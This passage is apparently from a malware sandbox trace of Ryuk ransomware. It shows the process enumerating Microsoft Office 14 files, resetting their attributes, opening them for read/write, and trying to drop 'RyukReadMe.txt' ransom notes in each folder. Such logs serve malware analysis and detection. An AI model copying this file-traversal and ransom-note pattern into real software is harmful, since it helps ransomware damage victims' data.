"c:\\program files\\microsoft office\\office14\\1033\\visio.shapesheet_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.534] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.534] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.534] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.534] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.534] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.534] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.534] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.535] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.535] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.535] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.535] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.535] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.538] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.538] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.539] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.539] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.539] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.539] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.539] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS", dwFileAttributes=0x80) returned 0 [0136.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.540] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.540] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.541] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.541] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.542] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_PRM_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_prm_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.542] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.542] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.542] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS", dwFileAttributes=0x80) returned 0 [0136.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.543] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.543] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.543] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.543] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.543] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.543] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.544] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.544] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.544] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.544] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.545] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.545] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL", dwFileAttributes=0x80) returned 0 [0136.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visutils.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.545] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.546] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.546] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL", dwFileAttributes=0x80) returned 0 [0136.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISWEB.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visweb.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.546] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.546] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.546] SetLastError (dwErrCode=0x0) [0136.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.546] GetLastError () returned 0x5 [0136.546] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.546] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.547] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.547] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir", dwFileAttributes=0x80) returned 0 [0136.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\Visfilem.vsdir" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\visfilem.vsdir"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.547] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.547] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.547] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.547] SetLastError (dwErrCode=0x0) [0136.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Vsdir\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\vsdir\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.548] GetLastError () returned 0x5 [0136.548] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.548] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.548] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.548] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.548] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDCMPVRD.XML", dwFileAttributes=0x80) returned 0 [0136.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WDCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wdcmpvrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.549] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.549] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.549] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.549] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.549] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS", dwFileAttributes=0x80) returned 0 [0136.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.550] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.550] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.550] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.550] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.550] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.550] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.550] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.550] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.550] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.551] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.551] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.551] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.551] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.552] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.552] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.553] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.553] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.553] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.553] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.553] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.554] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.554] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS", dwFileAttributes=0x80) returned 0 [0136.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.554] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.554] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.555] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.555] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.555] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.555] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.556] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.556] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.556] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.556] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.556] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 